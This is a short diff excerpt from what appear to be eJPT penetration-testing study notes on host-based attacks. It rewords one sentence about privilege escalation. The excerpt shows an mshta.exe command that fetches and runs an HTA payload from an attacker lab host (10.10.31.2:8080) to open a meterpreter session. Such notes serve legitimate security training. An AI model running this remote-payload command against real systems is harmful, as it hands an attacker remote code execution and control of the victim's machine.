jtr0000/eJPT-Notes/6 - System_Host Based Attacks/System_Host Based Attacks.md

 exploit
 ```

 Once the exploit is started, it will generate a host HTA link (e.g., `http://10.10.31.2:8080/Bn75U0NL8ONS.hta`) that a target only needs to visit once which would execute the embedded powershell commands of the HTA payload and establish a meterpreter session.
-In this case, we can run mshta.exe through the elevated cmd prompt.
+We can achieve privilege escalation by running mshta.exe through the elevated command prompt.

 ```
 mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta